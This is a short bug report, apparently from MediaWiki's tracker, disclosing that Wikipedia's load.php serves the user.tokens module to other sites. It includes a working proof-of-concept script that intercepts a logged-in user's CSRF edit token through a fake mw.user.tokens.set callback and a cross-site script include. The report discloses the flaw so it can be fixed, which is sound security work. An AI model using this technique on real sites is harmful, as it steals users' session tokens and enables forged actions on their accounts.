It's possible to load the user.tokens module remotely, stealing the contents of the tokens used for CSRF protection:
<script>
mw = {
loader: { implement: function(name, func) { var $ = {}; func($); } }, user: { tokens: { set: function(hashmap) { var token = hashmap.editToken; alert("your https://en.wikipedia.org session's edit token is " + token); } } }
};
</script>
<script src="https://en.wikipedia.org/w/load.php?modules=user.tokens"></script>
This module, and any others that expose private data, should probably not be allowed to be requested via load.php...
Version: unspecified
Severity: normal